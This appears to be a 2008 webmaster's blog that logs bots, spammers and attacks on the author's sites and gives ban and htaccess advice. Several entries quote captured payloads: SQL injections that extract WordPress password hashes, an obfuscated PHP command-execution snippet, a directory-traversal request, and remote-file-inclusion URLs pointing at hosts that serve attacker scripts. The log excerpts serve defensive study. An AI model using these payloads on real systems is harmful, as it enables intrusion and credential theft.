Dec 3, 2008

'mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol' wordpress hacker

Just detected this hacker. the ip is block by no-more-funn.moensted.dk

What is this useragent? (k1b compatible; rss 6.0; windows sot 5.1 security kol)

www._____.com/index.php?cat=%2527+UNION+SELECT+CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))+FROM+wp_users+where+id=1/*
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

www._____.com/index.php?cat=999+UNION+SELECT+null-CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))-null-null-null+FROM+wp_users+where+id=1/*
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

www._____.com/wp-trackback.php?p=1
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

www.____.com/xmlrpc.php
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

Nov 20, 2008

babycaleb.mvhosted.com hacker atacks

Baby hacker has moved to http://babycaleb.mvhosted.com

And his baby bots are now trying to inject this new url into websites.
The site when inspected using Spam Spade to avoid any virus infection shows the exploit is in the html just like before.

A search shows its infected many websites. http://www.google.com
Parsing input: http://babycaleb.mvhosted.com
Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178
host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)
Host babycaleb.mvhosted.com (checking ip) = 74.53.187.178
host 74.53.187.178 = picsfolio.com.187.53.74.in-addr.arpa (cached)
Routing details for 74.53.187.178
[refresh/show] Cached whois for 74.53.187.178 : abuse@theplanet.com
Using abuse net on abuse@theplanet.com
abuse net theplanet.com = abuse@theplanet.com
Using best contacts abuse@theplanet.com


Send abuse messages to theplanet.com

Nov 12, 2008

itsapic.com/crawler.html another beta

208.43.85.166
Required header 'Accept' missing GET / HTTP/1.0
User-Agent: Mozilla/5.0 (compatible; itsapic.com_crawler/0.01 +http://itsapic.com/crawler.html; crawler@itsapic.com)
Connection: close
Referer: http://u.webring.com/hub?ring=xxxxxxxxxxxxxxxx


This bot was scanning webing looking for sites and got blocked by BB so watch for it.
Website does not tell what its doing or ask permission to enter your site.


add to robots
User-agent: itsapic.com_crawler
Disallow: /

Nov 8, 2008

babycaleb.fortunecity.co.uk hacker now shut down.

Am getting a lot of these request lately

/shop/catalog/product_info.php?cPath=http://babycaleb.fortunecity.co.uk/index.htm

They are from lots of IPS all trying to remote load this page. Inside that page is a hack atempt. AVG gives an alarm if you try to view the source.

Do not go to the website babycaleb.fortunecity.co.uk AVG detects a virus but it still gets into your system. Look for ..
c:\windows\system32\tools\regexe.exe
a trojan horse downloader.generic8.cox

--updated-
The site has now been shutdown.

A search of google
http://www.google.com/search?q=babycaleb.fortunecity.co.uk shows that sites all over the net are infected with this atack and they are allowing the atack to spread. Perhaps they are involved in the atack?

Sep 11, 2008

serverkompetenz.net Hackers

serverkompetenz.net is a hacker not a spambot.

.com/nuke/index.php?k=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ GET HTTP/1.1
Agent:
 $x0e="\145x\x65\x63"; $x0f="\x66eo\146"; $x10="\x66\x72ea\x64"; $x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73"; $x12="i\163\x5f\162\x65s\157ur\x63\x65"; $x13="\152\157\x69\156"; $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73"; $x15="ob\137\x65\156d\137\x63lea\156"; $x16="\x6fb_st\x61\x72\164"; $x17="\x70\141\163s\164\x68\162\165"; $x18="\x70\143\154ose"; $x19="p\157\160e\x6e"; $x1a="\163h\145\154l\137\x65\170e\143"; $x1b="\x73\x79s\x74e\x6d"; function x0b($x0b){ global $x0e-$x0f-$x10-$x11-$x12-$x13-$x14-$x15-$x16-$x17-$x18-$x19-$x1a-$x1b; $x0c = ''; if (!empty($x0b)) {if($x11('exec')) {@$x0e($x0b-$x0c);$x0c = $x13("\n"-$x0c); }elseif($x11('shell_exec')) {$x0c = @$x1a($x0b); }elseif($x11('system')) {@$x16();@$x1b($x0b);$x0c = @$x14();@$x15(); }elseif($x11('passthru')) {@$x16();@$x17($x0b);$x0c = @$x14();@$x15(); }elseif(@$x12($x0d = @$x19($x0b-"\x72"))){ $x0c = ""; while(!@$x0f($x0d)) { $x0c .= @$x10($x0d-1024); } @$x18($x0d);} } return $x0c;}echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");


81.169.152.101 h986442.serverkompetenz.net

Bot atempted to include some script in place of its user agent string.

It then tried to remote load a script.
Blacklist Domain Ban: serverkompetenz.net
.com/nuke/index.php?k=http://www.jfc.info/jfcinfo/grafiken/i??? GET HTTP/1.1
Agent: http://cr4nk.ws/ [de] (windows 3.1; i) [crank]
81.169.152.101 h986442.serverkompetenz.net

Aug 22, 2008

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST

The latest hack running right now is a injection atempt using a string like this.

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C----removed----%20AS%20CHAR(4000));EXEC(@S);

This is a bot atack and is comming from everywhere.
The come in 2 at a time from the same IP.

They are trying to inject some code into your site to display a iframe that will take people to another site. It doesnt look like they are atacking PHP they are atacking ASP Cold Fusion and Perl See more here isc.sans.org

Also see this post which recomends.


RewriteCond %{REQUEST_URI} ^(.*)CAST(.*) [OR]
RewriteCond %{REQUEST_URI} ^(.*)DECLARE(.*) [NC,OR]

But a better page on how to block this by .htaccess is located here.


They are also scanning for a delay in page return so any script that sleeps when it detects a hack must have the sleep removed or they will come back and hit you harder.


Just the hits will bring you server down if you try to ban all the IPS being used so I have modified the hacker modules.

Update hacker modules Here.




You will also want to download your databases and scan them for IFRAMES and java script.

Aug 6, 2008

magnum.liquidweb.com hacker

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322)
64.91.248.2 magnum.liquidweb.com
string=[ feed=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fowofi%2F ]
hacker hits with this string trying to get my server to run his scripts.

then after geting banned keeps trying with this set of scripts.

?feed=http%3A%2F%2Fwww.qubestunes.com%2Ftreytest%2F1%2Fadoyuru%2Fzagu%2F
p=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fomoj%2Femuqir%2F

they all are scripts used by hackers to display a test message on your server
http://chyngachanga.ru/content/wuge/owofi/
http://www.qubestunes.com/treytest/1/adoyuru/zagu/
http://www.heaven-house.kz/templates_c/omoj/emuqir/

Jun 30, 2008

After banning the domain amazonaws.com because they are hosting bots.
I get all of this.

Agent: webclient
75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com
Agent: webclient
75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322)
67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com

Agent: Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com-crawl@powerset.com]
72.44.49.121 ec2-72-44-49-121.z-1.compute-1.amazonaws.com

Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.34.44 ec2-67-202-34-44.compute-1.amazonaws.com


-----Update AideRSS just does not get it that they have been blocked.
67.202.23.122 ec2-67-202-23-122.compute-1.amazonaws.com
[06-17-2008-16:07:52] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.226.160 ec2-75-101-226-160.compute-1.amazonaws.com
[06-17-2008-16:09:04] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.219.174 ec2-75-101-219-174.compute-1.amazonaws.com
[06-17-2008-16:09:19] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.21.42 ec2-67-202-21-42.compute-1.amazonaws.com
[06-17-2008-16:09:22] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.23.83 ec2-67-202-23-83.compute-1.amazonaws.com
[06-17-2008-16:09:29] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.211.7 ec2-75-101-211-7.compute-1.amazonaws.com
[06-17-2008-16:09:35] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.244.65 ec2-75-101-244-65.compute-1.amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.61.94 ec2-67-202-61-94.compute-1.amazonaws.com


Update

67.202.31.132 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.61.94 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.23.83 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.21.42 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.23.122 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.34.44 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.57.15 is BLACKLISTED by dnsbl.njabl.org for spam


The following comment is associated with this record: This network is a member of a dynamic hosting environment. See http://ec2.amazonaws.com/
It was added to the list: Tue Apr 1 12:41:39 2008 EST

spam source means the system was found via manual spam header parsing to be the origin of spam.

update july 15th
Agent: firefox/2.0.0.6 (ubuntu-feisty)
72.44.48.95 ec2-72-44-48-95.compute-1.amazonaws.com

Jun 17, 2008

openrbl.org is gone

openrbl.org is down and I need a replacement that can do a lookup on all of the block list and do a DNS lookup.

I did find a replacement of sorts. Change the admin.php $dns_lookup setting to.

$dns_lookup ="http://www.robtex.com/rbl/";


If anyone knows of one please post it.

Jun 6, 2008

Request contained a malicious JavaScript or SQL injection attack

bad-behavior is now blocking what it says is a SQL injection but all its really looking for is a # in the header. So I end up seeing crap like this.

I think this may be a bug in bad behavior

Update: I am still seeing this from the Yahoo bot

403 Request contained a malicious JavaScript or SQL injection attack
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
74.6.8.122 llf520018.crawl.yahoo.net

403 Request contained a malicious JavaScript or SQL injection attack
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
74.6.17.186 llf520164.crawl.yahoo.net

403 Request contained a malicious JavaScript or SQL injection attack www.winnfreenet.com
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
74.6.22.159 llf520079.crawl.yahoo.net



// Broken spambots send URLs with various invalid characters
// Some broken browsers send the #vector in the referer field :(
if (strpos($package['request_uri'], "#") !== FALSE) {
return "dfd9b1ad";
}

Jun 2, 2008

robot on pox1s.craigslist.org

Why would craigslist.org be running a bot?

403 Required header 'Accept' missing
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
66.150.243.17 pox1s.craigslist.org

Jun 1, 2008

barton.centeralnet.com bot

Agent: -NO AGENT-
216.32.80.66 barton.centeralnet.com

Some type of webhosting company in IRAN

developmentseed.org Bot 207.162.216.100 www1.developmentseed.org

Agent: python-urllib/2.4
207.162.216.100 www1.developmentseed.org

Why is developmentseed.org scanning my site using a free bot lib. ?

I dont see anything on the site about them running a bot.

hacker using email brancohat@gmail.com and script at www.1004smile.com/data/enviador.txt

Another hacker trying to inject a php script located at.
http://www.1004smile.com/data/enviador.txt

[05-31-2008-15:49:12]
advanced_search_result.php?categories_id=http://www.1004smile.com/data/enviador.txt?&servidor=www._____.com/advanced_search_result.php?categories_id=¶=brancohat@gmail.com GET HTTP/1.1
Agent: -NO AGENT-
81.171.34.37 kopkaas.com

This has something to do with the OSCOMMERCE search routine.

Lame Botnets

When you see the same lame bug in a bot comming from several IPS at the same time it must be a botnet. If you own any of these please remove the bots from your system.


[05-31-2008-12:24:55] bad-behavior 417 Header 'Expect' prohibited; resend without Expect /submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.1 (build 00975))
210.138.109.72 72.109.138.210.bn.2iij.net

[05-31-2008-12:25:03] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.1 (build 00975))
194.120.231.244 khe-fwcluster-ext.khe.agile.agilesoft.com

[05-31-2008-12:25:08] bad-behavior 403 Required header 'Accept' missing
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)
216.106.84.150 mx3.ntm.org

[05-31-2008-12:25:10] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
194.120.231.244 khe-fwcluster-ext.khe.agile.agilesoft.com

[05-31-2008-12:25:17] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
129.142.64.65 chef.catpipe.net

[05-31-2008-12:25:23] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
213.134.40.89 baphealth.c.mad.interhost.com


[05-31-2008-12:26:35] bad-behavior 417 Header 'Expect' prohibited; resend without Expect
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.1 (build 00975))
194.120.231.244 khe-fwcluster-ext.khe.agile.agilesoft.com

[05-31-2008-12:26:47] bad-behavior 417 Header 'Expect' prohibited; resend without Expect
Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
62.3.32.27

[05-31-2008-12:26:54] bad-behavior 417 Header 'Expect' prohibited; resend without Expect
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
62.3.32.27

[05-31-2008-12:27:20] bad-behavior 417 Header 'Expect' prohibited; resend without Expect
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
163.24.235.249

May 26, 2008

Mozilla/5.0 (MrCarlito-0.1 http://www.mrcarlito.com/spider.html)

bad-behavior
403 Required header 'Accept' missing
Agent: Mozilla/5.0 (MrCarlito-0.1 http://www.mrcarlito.com/spider.html)
64.237.57.194 64-237-57-194.reliableservers.com

MrCarlito-0.1 is an experimental spider that collects header & link information from web pages. The spider is written in PERL (Practical Extraction and Report Language), and uses the LWP::UserAgent Class. Currently this spider does not delve into websites, it simply obtains the headers & hostnames contained in your web page index.


Humm you had better fix this broken bot if you plan on using it for a real website.
Your blocked because you were detected loading webpages not headers.

Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com-crawl@powerset.com

Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com-crawl@powerset.com


blocked by bad-behavior
403 Required header 'Accept' missing
Agent: Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com-crawl@powerset.com]
67.202.57.133 ec2-67-202-57-133.compute-1.amazonaws.com


Another broken bot running on amazonaws.com

www.radian6.com/crawler

Wow another corp snoop bot. see http://www.radian6.com/crawler/


r6_feedfetcher(www.radian6.com/crawler)
r6_commentreader(www.radian6.com/crawler)
142.166.3.122
142.166.170.93
142.166.170.92

It does not follow robots.txt file so you have to email someone to tell them to stop buring up your bandwidth. Hu?

I really hate these corp PR snoops that think you have to sever content to them.
I wonder if they ever thought about the fact that taking my content and serving it up to subscribers (charging for it) without my permission is a criminal copyright violation.

May 15, 2008

IncrediBILL's Random Rants: Impact On Your Bandwidth Will Be Minimal My Ass

This just about sums up where trafic is going today.

IncrediBILL's Random Rants: Impact On Your Bandwidth Will Be Minimal My Ass

skweezer.net open proxy service

Post UPDATED::

See orginal post here This site skweezer.net
is a proxy for moble content. Will allow users that you have banned to bypass your ban and use this site as a proxy.

bad behavior blocks no longer blockes this site. And its domain has changed.
Also no longer inserts adverts around your content but strips out your adverts.

Old ones
65.38.160.138 hugehosting.com
65.38.160.162 hugehosting.com
65.38.160.160 hugehosting.com
New ones so far
65.38.160.138 gwc05.gwcorp.net
65.38.160.156 gwc14.gwcorp.net

Likely more.

Add the domain name to the domain ban file of MMAUTOBAN
hugehosting.com,proxy
gwcorp.net,proxy


And add the ip block to your htaccess file.
deny from 65.38.160.0/24

May 10, 2008

yandex.ru bot

yandex/1.01.001 (compatible; win16; h)
Last Hit From walrus020.yandex.ru 77.88.22.115
First Hit From walrus085.yandex.ru 77.88.22.151


Violates robots file see http://www.braemoor.co.uk

67.202.15.206 compute-1.amazonaws.com www.powerset.com

This company powerset.com says "we employ a small army of PhDs" But they know nothing about building bots. The blog they run won't even take comments without giving a error page.

bad-behavior 403 Required header 'Accept' missing
Agent: Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com-crawl@powerset.com]
67.202.15.206 ec2-67-202-15-206.z-1.compute-1.amazonaws.com

amazonaws.com keeps showing up in my logs. It looks like this is a web hosting div of amazon so we may be able to ban it without banning amazon.

May 1, 2008

List of hacker servers

I ran into this site that is keeping a list of the sites hosting the scripts used to attack your site. The user tries to get your site to run a script located on one of these sites and once it does he can take over your site.
The hacking is explained here http://www.whyron.com/http.htm

List is here http://www.whyron.com/http0.htm

You should add the domains from this list to the hackers.txt file in MMAUTOBAN to users attempting to inject these scripts on your server.

Free submit script for your website.

Ran into this its a free submit form. I dont use it since wrote my own perhaps when I have the time I will make a free version of it.

This one looks like it works just dont use the reply to user options. Since you should never have a form reply to someone because it can be used to relay spam via your server.

GBCF-v3 Secure & Accessible Form Script


While your at it never take input from a form and use that input to create a message headers like To: and subject: always hard code the headers and put the inputed fields inside the body of the message.

Apr 23, 2008

beta.rover-host.com SPAMMER

/blog.php/?feed=rss2 POST HTTP/1.0 spam=[+Content-Type=application/x-www-form-urlencoded&+charset=utf-8&+title=anal nude wevcams&+url=http://www.__removed___.com&+blog_name=anal nude wevcams&+excerpt=anal nude wevcams&]
Agent: snoopy v1.2.3
64.22.110.2 beta.rover-host.com

Caught you spammer trying to inject spam into my rss feed on Wordpress

outlookconnector/1.9 (tmstmpext; msoffice 12)

outlookconnector/1.9 (tmstmpext; msoffice 12)
All Hits From ip68-11-62-209.no.no.cox.net 68.11.62.209

Anyone know what this useragent is?

This thing is a hog with all usage comming from one user on COX.

I am banning it unless someone knows what it is.

Apr 14, 2008

twiceler www.cuill.com Bandwidth HOG

This bot just can not take no for a answer. It keeps trying to scan my site.

Tried adding to the robots on 12/5/06 and testing in 08 still shows it scanning my system. It was just caught ignoring the robots file and fell into unlisted bot traps.

IP BAN Fell into unlisted bot trap
Agent: mozilla/5.0 (twiceler-0.9 http://www.cuill.com/twiceler/robot.html)
208.36.144.8 crawl-17.cuill.com

See more info on what others are saying here


User agent has changed since I last saw it and they are now using new ips.

upcomingvideo.info atempts union injections

The request for /wp-admin/admin-ajax.php caused a autoban.

ALARM: UNION ALL SELECT injection string=[ cookie=wordpressuser_e3e8b95c4f440b1cebd0041c4a3dda48=xyz%27 UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM wp_users WHERE ID=1 AND IF(LENGTH(user_pass)>31,BENCHMARK(1,MD5(1337)),3)/*; wordpresspass_e3e8b95c4f440b1cebd0041c4a3dda48=p0hh&]

---
* M&M Autoban V3.8 *
IP: [82.146.52.117 upcomingvideo.info ] Counter[44602]
URL: []
Agent: [mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; .net clr 2.0.50727)]
Cookie:[]




upcomingvideo.info this gets you banned from all sites.

Mar 27, 2008

Installing autoban script in PHPNUKE

>> >> From : ___@gmail.com
> > in the phpnuke setup, it mentions adding something above $modfiles in the >>modules.php file, I can\'t see that in mine, any ideas on where to put this extra >>piece of code to stop the union injections?


Since your email address is no good I will answer you here.


Be sure you have v3.8 and the latest BB
After you have installed the script and have it running.
Click on setup.
Click on phpnuke setup. This generates the strings to insert..

Insert the green line listed on that page into your script to activate protection.
The red lines use the built in phpnuke detection to ban any hacker it finds.

The union injection hacks can be added but are no longer needed because the script now does that inside the hacker scan module and you can add any hacks you find to that scan.

Mar 20, 2008

What is blogged_crawl/0.3

Just what is this blogged crawler.

Agent: blogged_crawl/0.2
74.52.1.194 c2.1.344a.static.theplanet.com


Agent: blogged_crawl/0.3
74.54.159.147 93.9f.364a.static.theplanet.com

Mar 13, 2008

speedy.telkom.net.id union injections

Joker from speedy.telkom.net.id atempted union injection into database.


ALARM: union%20select injection string=[ name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20concat(pwd,0x7c,0x4861636B2042792053694 ]

IP: [125.163.204.65 65.subnet125-163-204.speedy.telkom.net.id ]
Agent: [mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; fdm)]

Mar 9, 2008

Full story on Shareaza (www.shareaza.com no longer is Shareaza go to >> shareaza.sourceforge.net

The full story and history on Shareaza.


Beginnings Are a Good Place To Start

In mid 2002, a lone programmer by the name of Micheal Stokes released the first version of a Gnutella client he had written and dubbed "Shareaza". Over the next two years Micheal added to his client and coded in support for the eDonkey 2000 network, BitTorrent and a rewritten Gnutella-based protocol which he named Gnutella2. Shareaza gradually became more and more popular and Mike started to receive job offers based on the strength of his work on Shareaza. He eventually decided that continuing to work on a p2p application in an increasingly hostile legal climate was too risky, but he did the honorable thing and released the Shareaza source code under the GNU GPLv2 on June 1, 2004 (which coincided with the release of Shareaza version 2.0).

Mike stopped working on Shareaza and went on to develop a new p2p-based streaming radio project named Mercora. As part of distancing himself from Shareaza, he transfered the shareaza[DOT]com domain to one of his old alpha testers named Jon Nilson who continued to administer the domain until late 2007.

The French Connection

In late 2007 the Shareaza website went down for several weeks, but eventually came back online. Not long after that, the shareaza[DOT]com domain began pointing to a different website which several sharp-eyed community members recognized as identical to shareazaweb.com, a known scam site purporting to offer users "legal p2p downloads". It soon emerged that Jon Nilson had been forced to relinquish control of the domain as part of a settlement with La Societe Des Producteurs De Phonogrammes En France (the French version of the RIAA). Jon's name was the only one connected with Shareaza that the SPPF could find and due to Shareaza's popularity in France he had been named in a lawsuit along with Azureus and Morpheus. See (viewtopic.php?f=46&t=85) for more information.

A Dump for Ill-Gotten Gains

Members of the Shareaza community managed to track the new "owners" of the shareaza[DOT]com domain to MusicLab LLC, based in New York. MusicLab now distribute the "new and legal" iMesh p2p client after the original Gnutella-based iMesh developers were sued by the RIAA and were forced to settle for $4.1 million and a promise to turn their app into a paid download service. A similar legal fate befell another popular Gnutella appliction called Bearshare which was then rolled into the RIAA-approved iMesh. Nobody has managed to ascertain whether the original iMesh developers are still involved, but the merging of Bearshare seems to indicate that MusicLab is a vehicle used by the recording industry to dump assets acquired through lawsuits into.

It would seem that since Shareaza is developed by anonymous group of individuals and organized via "ad-hocracy", there was no company to sue, so stealth tactics were employed against the weakest link in the chain: Jon Nilson. iMesh, Bearshare and the fake Shareaza being distributed from shareaza[DOT]com are all the same application with appropriate rebranding.


Threats of C&D

As you can imagine, the members of the Shareaza community were rather upset about all of this and set up a new website with user forums. After two users made some offhand remarks about a distributed denial of service attack against the servers in Israel where the hijacked shareaza[DOT]com site is located, our forum administrator received an email from one Jeffrey A. Kimmel of Meister Seelig & Fein, in his capacity as a representative of Discordia Ltd, the new new "owners" of Shareaza. Mr Kimmel stated that DDoS attacks are illegal and any further talk by "users [who] begin to promote the destruction of a legitimate business" would result in Discordia Ltd "tak[ing] all necessary action to vigorously and relentlessly protect its rights." He went on to state that "if this action is not immediately taken and, as result, our client's business is harmed, we will not only pursue, locate and hold fully responsible each and every one of those who have implemented this, or any similar DoS, but also those responsible for maintaining your site and the forums."

The posts in question had actually been taken down by forum moderators already (as per forum rules on objectionable content), however this email was cause for great concern: not only were the domain hijackers starting to create a series of shell companies to avoid being identified, but they had engaged lawyers to monitor our forums and threaten anyone making disparaging statements about them.

(Full text here: viewtopic.php?f=46&t=752)

A Tangled Web

More research by community members revealed that Discordia Ltd is registered in Cyprus, possibly owned by MusicLab but at arm's length to avoid as much fallout as possible. Meister Seelig & Fein's Kimmel also appears to have a long history of dealings with the recording industry, notably in the participation of the iMesh and Bearshare lawsuits and an interesting Amicus Curiae brief in the MGM vs Grokster which details how the new iMesh software has all the answers to stopping piracy and creating a wonderful legal download service.

Making The Takeover Official

In what is possibly the most audacious step so far, Discordia Ltd filed for a trademark on "Shareaza" with the USPTO on January 10, 2008. (See: http://tmportal.uspto.gov/external/port ... T=77368229)

If granted, our use of the Shareaza name will immediately infringe upon Discordia Ltd's official trademark and we will doubtless be subject to legal action until we stop any infringing action i.e. we rename the project, remove all references to "Shareaza" and forget about the whole thing.


The Danger Posed To Open Source Software

Unless we are able to prevent the trademark being granted and regain control of the domain, our project will die. It really is as simple as that. Seven-odd years worth of brand recognition as "Open Source, Spyware, Malware and Advertising Free" will disappear and although we can (and have) dealt with "clones" who take our OS code base, add some spyware and release a "new" client as their own (breaking the GPLv2 in the process by not releasing the source) there is no possible way that we can survive having our identity stolen like this. Unlike a run-of-the-mill copyright violation, we are going to be permanently deprived of something. Our code is open to whoever wants to see it, we charge no money for the use of the program; the only thing of value that we have is the name and recognition that goes with it. The worst of it all is that this "software identity theft" could signal the beginning of hostile corporate takeovers of common property - the fact that we are in this predicament proves it to some extent.

What we need to know is if the people who stood up for an open culture by hacking copyright law will help protect that culture where it comes to trademarks and halting the advancement of encroaching corporate interests. If "common law" trademarks can't be protected there is a very real danger that what happened to us will happen again and again and again. Many of us who work on the Shareaza project can foresee things becoming so that people will stop bothering to work on OS projects: open source software is, by it's nature, more useful that closed source software and the more useful something is, the more popular it becomes...and then someone with expensive lawyers will come along and take it all away from the people who actually created it.

We recently asked for donations from our users for a legal defense fund and (very) quickly raised $2000. In our public thank you letter we wrote the following:

"In all discussions regarding intellectual property, there is one fundamental right that is never in dispute: the right to be recognized as a creator. This moral right transcends arguments on whether copyright should last for 50 years or a hundred, whether software should be patentable or not, or even what a fair price price for an MP3 file is. Being able to say to the world "I made this" and be acknowledged for it is, for many people, the only reward they receive for their work. To deny that right is to insult to the creative forces flowing through every writer, performer, musician, actor and programmer who brings their work to the world."

We have a section dedicated to this whole situation on our new forums (viewforum.php?f=46) which includes full details of all the events that have taken place so far.

Any help you are able to provide would be very, very gratefully accepted. Any advice, introductions or referrals to others who may be able to help us will be a great help.

Kind regards,

Shareaza Community



Feb 29, 2008

new bot trap listings

Why are all of these ips falling into bot traps?
Looks like a bot net thats trying to spider web sites.

75.126.231.122,2008-02-24,basetower.com,AB,BAN,Fell in bot trap
195.114.26.150,2008-02-28,hestia.produhost.net,AB,BAN,Fell in bot trap
149.156.132.152,2008-02-28,riad.pk.edu.pl,AB,BAN,Fell in bot trap
82.210.30.123,2008-02-28,son.s-online.at,AB,BAN,Fell in bot trap
87.230.22.135,2008-02-28,i-dreams.net,AB,BAN,Fell in bot trap
193.71.16.18,2008-02-28,-,AB,BAN,Fell in bot trap
88.191.11.195,2008-02-28,sd-301.dedibox.fr,AB,BAN,Fell in bot trap
207.210.117.6,2008-02-29,dman.com,AB,BAN,Fell in bot trap
89.248.99.66,2008-02-29,infurma.es,AB,BAN,Fell in bot trap
194.109.91.146,2008-02-29,kkadam.xs4all.nl,AB,BAN,Fell in bot trap
210.127.253.75,2008-02-29,-,AB,BAN,Fell in bot trap

Feb 28, 2008

"Fake Shareaza" takes over updates from the real thing

Posted by Erica George Wed, 20 Feb 2008 21:06:00 GMT

Users of the popular filesharing application Shareaza are reporting that a competitor has taken over a former Shareaza website and is using it to overwrite the real Shareaza application with an impostor posing as an update.

How is that possible? According to Sarah Pike at AppScout:

Someone took great advantage of old code in Shareaza, which checks for updates with, among other URLs, www.shareaza.com, which another company has now registered. So when the real Shareaza does its regular thing and checks in for updates, it offers to download the fake Shareaza to replace itself.
For software producers, this is an important wake-up call. If your software automatically checks a website for updates, you’re responsible for what that website delivers to your users, so it’s important to maintain control of that site.

Users shouldn’t see the Shareaza switch as a reason to forgo software updates. As the AppScout post discusses, in this kind of social engineering scam there are often warning signs that something may not be quite right. Be sure you read dialog boxes carefully before clicking OK and agreeing to anything, including an update. And do your best to stay informed about the software you use by signing up for alerts from the distributor, or regularly checking for news.

--clip----


We warned you about this domain being hyjacked a while ago. You are also warned that the software installs some bots on your system so if you dio download this imposter you need to scan your system for adaware.

Get the real program at its new location

Feb 20, 2008

ns.allwatch.us spambot

400 Prohibited header 'Proxy-Connection' present
Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)
87.118.118.254 ns.allwatch.us

No trafic should be comming from this domain its a RU watch site so its banned.

porting Bad Behavior to any PHP script

If you are having trouble porting Bad Behavior to a PHP script
All you have to do is use the scripts in MM Autoban and the work is done for you. Just install BB under the MM autoban directory. You dont have to use MMAutoban you can just call BB.

Feb 19, 2008

More Botnets found

403 User-Agent was found on blacklist
